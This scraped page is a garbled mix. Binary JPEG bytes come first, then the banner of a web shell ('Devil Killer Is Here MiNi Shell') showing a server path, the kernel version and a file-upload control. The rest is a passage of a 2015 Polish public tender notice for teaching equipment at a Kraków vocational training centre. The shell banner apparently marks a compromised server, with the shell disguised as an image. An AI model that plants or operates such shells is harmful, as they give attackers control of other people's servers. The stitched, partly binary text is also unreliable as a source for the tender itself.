JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150505/63721-N-2015.html

<p class="kh_header"><b>Kraków: Zakup i dostawa sprzętu dydaktycznego do pracowni w Centrum Kształcenia Praktycznego w Krakowie w ramach projektu pn.: Modernizacja sieci kształcenia zawodowego poprzez doposażenie i unowocześnienie bazy dydaktycznej Centrum Kształcenia Praktycznego w Krakowie</b><br>
<b>Numer ogłoszenia: 63721 - 2015; data zamieszczenia: 05.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kształcenia Praktycznego , ul. Krupnicza 42a, 31-123 Kraków, woj. małopolskie, tel. 012 4223218, 0604 845344, faks 012 4223218.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckp.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu dydaktycznego do pracowni w Centrum Kształcenia Praktycznego w Krakowie w ramach projektu pn.: Modernizacja sieci kształcenia zawodowego poprzez doposażenie i unowocześnienie bazy dydaktycznej Centrum Kształcenia Praktycznego w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakup i dostawa sprzętu dydaktycznego do pracowni Centrum Kształcenia Praktycznego w Krakowie w ramach projektu pn.: Modernizacja sieci kształcenia zawodowego poprzez doposażenie i unowocześnienie bazy dydaktycznej Centrum Kształcenia Praktycznego w Krakowie.
Zamówienie będzie realizowane w następujących częściach: 
Część 1 - Zadanie 1 - Zakup i dostawa sprzętu dydaktycznego do pracowni mechatroniki:
1. Zestaw dydaktyczny - stanowisko rozdzielania obrabianych przedmiotów z wyposażeniem - 1 kpl;
2. Zestaw dydaktyczny - stanowisko kontroli obrabianych przedmiotów z wyposażeniem - 1 kpl;
3. Zestaw dydaktyczny - stanowisko składania obrabianych przedmiotów z wyposażeniem - 1 kpl;
4. Zestaw dydaktyczny - stanowisko prasa do montażu obrabianych przedmiotów z wyposażeniem - 1 kpl;
5. Zestaw dydaktyczny - stanowisko sortowania obrabianych przedmiotów z wyposażeniem - 1 kpl;
6. Oprogramowanie dydaktyczne do stanowisk modułowego systemu produkcyjnego.
Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku Nr 1 SIWZ.
Część 2 - Zadanie 2 - Zakup i dostawa sprzętu dydaktycznego do pracowni odnawialnych źródeł energii - pracownia montażu:
1. Zestaw solarny z absorberem aluminiowo-miedzianym - kompletny;
2. Zestaw solarny z absorberem aluminiowym - kompletny;
3. Kolektor próżniowy - 1 sztuka;
4. Powietrzna pompa ciepła - 1 sztuka;
5. Pompa ręczna do napełniania instalacji - 1 sztuka;
6. Sterowniki - 16 sztuk.
Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku Nr 2 SIWZ.
Część 3 - Zadanie 3 - Zakup i dostawa sprzętu do pracowni odnawialnych źródeł energii - laboratorium:
1. Zestaw dydaktyczny - Fotowoltaika;
2. Zestaw dydaktyczny - Fotowoltaika 20 W;
3. Zestaw dydaktyczny - Energia wiatru;
4. Zestaw dydaktyczny - Kolektor słoneczny;
5. Zestaw dydaktyczny - Pompa ciepła;
6. Zestaw dydaktyczny - Pompa ciepła powietrze-woda z klimakonwektorem i zasobnikiem z wężownicą;
7. Zestaw dydaktyczny - Kondensacyjny kocioł na pelety z wyposażeniem;
8. Zestaw dydaktyczny - Ogniwo paliwowe;
9. Zestaw dydaktyczny - Ogniwo paliwowe (rozbudowany);
10. Zestaw dydaktyczny - Czysta energia;
11. Zestaw dydaktyczny - Biopaliwa;
12. Zestaw dydaktyczny - Magazynowanie energii;
13. Plansze dydaktyczne z OŹE;
14. Komputer przenośny - laptop (8 szt.);
15. Stół elektrotechniczny z konsolą zasilającą (6 szt.)
Szczegółowy opis przedmiotu zamówienia znajduje się w Załączniku Nr 3 SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 38.80.00.00-3, 31.70.00.00-3, 48.19.00.00-6, 09.33.11.00-9, 44.62.20.00-6, 44.62.21.00-7, 39.16.21.10-9, 44.62.12.20-7, 42.51.11.00-2, 42.51.11.10-5, 44.41.10.00-4, 38.00.00.00-5, 39.18.10.00-4, 30.21.31.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie przez Wykonawcę w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 dostawy obejmującej:
a) Dla zadania 1 - dostawę sprzętu dydaktycznego odzwierciedlającego przemysłową linię produkcyjną występującą w zakładach przemysłowych z funkcją rozdzielania, kontroli, składania, montażu i sortowania przedmiotów obrabianych na łączną kwotę nie mniejszą niż 150 000 zł netto; 
b) Dla zadania 2 - dostawę zestawów solarnych zawierających pompę ciepła do ogrzewania ciepłej wody użytkowej na łączną kwotę nie mniejszą niż 12 000 zł netto; 
c) Dla zadania 3 - dostawę sprzętu dydaktycznego z zakresu odnawialnych źródeł energii, w tym kondensacyjnego kotła na pelety z modułem buforowego zbiornika na wodę, modułem rozbioru wody użytkowej i modułu klimakonwektora wraz z obudową dydaktyczną na łączną kwotę nie mniejszą niż 190 000 zł netto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się także następujące dokumenty i oświadczenia:
a). Formularz ofertowy wraz z formularzem cenowym (odpowiednio dla części 1, 2, 3 zamówienia) - zgodnie ze wzorem stanowiącym załącznik nr 4, 4a, 4b, 4c do SIWZ. 
b). Oświadczenie potwierdzające, iż Wykonawca samodzielnie wykona zamówienie lub wskazujące części zamówienia, których wykonanie zamierza powierzyć podwykonawcom - zgodnie ze wzorem stanowiącym załącznik nr 5 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Gwarancja - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1) zmian w zakresie terminu realizacji - w przypadku wystąpienia sytuacji określonej w § 3 ust. 2 umowy - załącznik Nr 10 do SIWZ,
2) zmian w zakresie podwyższenia parametrów oferowanych urządzeń, jeżeli są konieczne dla dalszej realizacji zamówienia lub są korzystne dla Zamawiającego i nie powodują zwiększenia wynagrodzenia.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
1) zmiana danych związanych z obsługa administracyjno-organizacyjna Umowy (np. zmiana nr rachunku bankowego),
2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ckp.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Kształcenia Praktycznego, 31-123 Kraków, ul. Krupnicza 42a, sekretariat pokój 110, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.05.2015 godzina 10:00, miejsce: Centrum Kształcenia Praktycznego, 31-123 Kraków, ul. Krupnicza 42a, sekretariat pokój 110, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013,
Działanie 1.1 - Poprawa jakości usług edukacyjnych 
Schemat B - Rozwój infrastruktury kształcenia ustawicznego oraz kształcenia zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Zakup i dostawa sprzętu dydaktycznego do pracowni mechatroniki w ramach projektu pn.: Modernizacja sieci kształcenia zawodowego poprzez doposażenie i unowocześnienie bazy dydaktycznej Centrum Kształcenia Praktycznego w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup i dostawa sprzętu dydaktycznego do pracowni mechatroniki:
1. Zestaw dydaktyczny - stanowisko rozdzielania obrabianych przedmiotów z wyposażeniem - 1 kpl, - wyposażone w stację dystrybucji, której zadaniem będzie rozdzielenie elementów przeznaczonych do magazynowania oraz przeniesienia rozdzielonych elementów do następnego modułu znajdującego się w linii dydaktycznego systemu produkcji.
Główne zespoły stacji to magazyn opadowy (magazyn z siłownikiem dwustronnego działania) oraz zespół siłownika obrotowego. 
Działanie modułu ma polegać na:
- rozdzieleniu elementów zgromadzonych w magazynie, 
- podaniu elementu do miejsca pobrania,
- pobraniu elementu przez podajnik podciśnieniowy, 
- podaniu elementu do następnej stacji.
2. Zestaw dydaktyczny - stanowisko kontroli obrabianych przedmiotów z wyposażeniem - 1 kpl, - zadaniem stanowiska kontroli będzie rozpoznanie różnych właściwości założonych przedmiotów obrabianych za pomocą czujnika optycznego i pojemnościowego. Poprzez układ czujników i dokonaniu pomiaru przedmioty w zależności od wykonania - wykonane prawidłowo będą kierowane do kolejnego stanowiska znajdującego się w linii dydaktycznego systemu produkcyjnego, natomiast - wykonane nieprawidłowo będą odrzucane.
3. Zestaw dydaktyczny - stanowisko składania obrabianych przedmiotów z wyposażeniem - 1 kpl, - stanowisko do składania przedmiotów obrabianych ma rozpoznać, poprzez czujniki fotoelektryczne, właściwe przedmioty, następnie przedmiot będzie transportowany na taśmie do pneumatycznego rozdzielacza i rozpoznawany przez drugi czujnik fotoelektryczny. Moduł za pomocą chwytaka podciśnieniowego pobiera wkład przedmiotu obrabianego i kładzie go na obudowę, a następnie kompletny przedmiot obrabiany zostaje przesłany na kolejne stanowisko znajdujące się w linii dydaktycznego systemu produkcyjnego;
4. Zestaw dydaktyczny - stanowisko prasa do montażu obrabianych przedmiotów z wyposażeniem - 1 kpl, - stanowisko do montażu przedmiotów obrabianych poprzez dociskanie wstępnie dopasowanych dwóch elementów tzw. - funkcja prasy. Po wykonaniu tych czynności następnie gotowy przedmiot obrabiany będzie transportowany na pozycję przekazania za pomocą manipulatora obrotowo-liniowego na kolejno stanowisko znajdujące się w linii dydaktycznego systemu produkcyjnego;
5. Zestaw dydaktyczny - stanowisko sortowania obrabianych przedmiotów z wyposażeniem - 1 kpl, - stacja sortowania - rozdziela wcześniej zmontowane zespoły w zależności od koloru korpusu (podstawy) i kieruje je na co najmniej trzy zsuwnie, będzie ostatnią stacją w ciągu automatycznej linii produkcyjnej. Powinna również spełniać funkcję jako stacja przygotowawcza do paletyzacji;
6. Oprogramowanie dydaktyczne do stanowisk modułowego systemu produkcyjnego, a w tym:
- program STEP 7 Trainer Package lub równoważny - licencja na 12 stanowisk, 
- program przeznaczony do nauki teorii i praktyki z wielu dziedzin z zakresu mechatroniki, 
- program przeznaczony do symulacji pracy poszczególnych stanowisk oraz zamawianych wybranych zestawów stanowisk odzwierciedlających dydaktyczną linię produkcyjną.
Szczegółowy opis (wszystkich pozycji) przedmiotu zamówienia określa Załącznik Nr 1, dołączony do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 38.80.00.00-3, 31.70.00.00-3, 48.19.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Gwarancja - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Zakup i dostawa sprzętu dydaktycznego do pracowni odnawialnych źródeł energii - pracownia montażu w ramach projektu pn.: Modernizacja sieci kształcenia zawodowego poprzez doposażenie i unowocześnienie bazy dydaktycznej Centrum Kształcenia Praktycznego w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W skład dostawy wchodzą następujące zestawy dydaktyczne:
1. Zestaw solarny z absorberem aluminiowo-miedzianym - kompletny;
- kolektor słoneczny 2 szt, zestaw przyłączeniowy, otulina w osłonie, profil maskujący, zespół pompowo-sterowniczy, podgrzewacz CWU z pompą ciepła min 2,3 kW, zespół naczynia przeponowego, zestaw przłączeniowy podgrzewacza, akcesoria do montażu;
2. Zestaw solarny z absorberem aluminiowym - kompletny;
- kolektor słoneczny 2 szt., zestaw przyłączeniowy kolektora, otulina w osłonie, profil maskujący, zespół pompowo-sterowniczy, podgrzewacz CWU, zespół naczynia przeponowego, zestaw przyłączeniowy podgrzewacza, rura elastyczna ze stali nierdzewnej DN 16, nakrętka do rury elastycznej 3-4 cala, uchwyty do rury elastycznej DN 15-20, akcesoria do montażu;
3. Kolektor próżniowy - 1 sztuka;
- kolektor próżniowy z elementami do montażu - zestaw przyłączeniowy, uchwyt uniwersalny, konstrukcja uniwersalna;
4. Powietrzna pompa ciepła - 1 sztuka;
- moc grzewcza minimum 2,5 kW, współczynnik efektywności w warunkach optymalnych COPA7/W35 co najmniej 3,8, typ sprężarki - rotacyjna, czynnik chłodniczy - R134a, 1200;
5. Pompa ręczna do napełniania instalacji - 1 sztuka;
- pojemność zbiornika max. 3 dm3;
6. Sterowniki - 16 sztuk.
- panel użytkownika w obudowie, klawiatura z wyświetlaczem LCD, zdalne sterowanie, zakres stosowania:
- sterowanie pracą kolektorów słonecznych - 8 sztuk,
- sterowanie pompami ciepła - 8 sztuk.
Szczegółowy opis (wszystkich pozycji) przedmiotu zamówienia określa Załącznik Nr 2, dołączony do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.33.11.00-9, 44.62.20.00-6, 44.62.21.00-7, 42.51.11.10-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Gwarancja - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Zakup i dostawa sprzętu dydaktycznego do pracowni odnawialnych źródeł energii - laboratorium w ramach projektu pn.: Modernizacja sieci kształcenia zawodowego poprzez doposażenie i unowocześnienie bazy dydaktycznej Centrum Kształcenia Praktycznego w Krakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W zakresie dostawy wchodzą następujące zestawy dydaktyczne:
1. Zestaw dydaktyczny - Fotowoltaika - 1 kpl - umożliwiający budowę kompletnego systemu fotowoltaicznego w skali laboratoryjnej i przeprowadzanie szczegółowych analiz jego poszczególnych elementów;
2. Zestaw dydaktyczny - Fotowoltaika 20 W - 1 kpl - pozwalający na poznanie zasady działania ogniwa fotowoltaicznego i umożliwiający przeprowadzenie wskazanych ćwiczeń dydaktycznych z dwoma modułami o mocy co najmniej 20 W;
3. Zestaw dydaktyczny - Energia wiatru - 1 kpl - laboratoryjny umożliwiający możliwość przeprowadzania praktycznych ćwiczeń/eksperymentów z dziedziny energii wiatru wraz z elementami fizyki oraz poznania zasad funkcjonowania różnych rodzajów turbin wiatrowych;
